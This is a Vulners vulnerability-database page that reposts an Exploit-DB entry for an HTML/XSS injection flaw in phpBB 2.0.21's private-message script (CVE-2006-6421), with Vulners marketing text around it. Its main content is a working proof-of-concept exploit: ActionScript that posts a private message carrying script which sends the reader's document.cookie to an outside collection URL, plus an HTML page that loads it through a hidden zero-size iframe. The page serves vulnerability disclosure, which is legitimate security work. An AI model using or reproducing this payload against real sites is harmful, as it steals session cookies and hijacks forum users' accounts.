Lucene search
+L

phpBB 2.0.21 - 'privmsg.php' HTML Injection

🗓️ 11 Jan 2007 00:00:00Reported by DementialType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 35 Views

phpBB 2.0.21 HTML Injection vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
Tenable Nessus
phpBB < 2.0.22 Multiple Vulnerabilities
29 Dec 200600:00
nessus
Tenable Nessus
phpBB < 2.0.22 Multiple Vulnerabilities
3 Jan 200700:00
nessus
CVE
CVE-2006-6421
10 Dec 200611:00
cve
Cvelist
CVE-2006-6421
10 Dec 200611:00
cvelist
EUVD
EUVD-2006-6404
7 Oct 202500:30
euvd
NVD
CVE-2006-6421
10 Dec 200611:28
nvd
UbuntuCve
CVE-2006-6421
10 Dec 200611:28
ubuntucve
source: https://www.securityfocus.com/bid/22001/info

phpBB is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.

Attacker-supplied HTML and script code would execute in the context of the affected website, potentially allowing an attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.

Version 2.0.21 is vulnerable; other versions may also be affected.

Create a Shockwave Flash file with this code:

var username:String = "user_that_doesnt_exist";
var subject:String = "Xss Exploitation";
var message:String = "&lt;/textarea&gt;<script>document.location= 'http://site.com/cookie.php?c=' + document.cookie </script>";
var folder:String = "inbox";
var mode:String = "post";
var post:String = "Submit";
getURL("http://www.example.com/phpBB2/privmsg.php", "_self", "POST");

Put it into a web page:

<html>
<head>
<title>Put a title here</title>
</head>
<body>
<p>Put some text here<p>
<iframe src="http://www.example.com/exploit.swf" frameborder="0" height="0" width="0"></iframe>
</body>
</html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation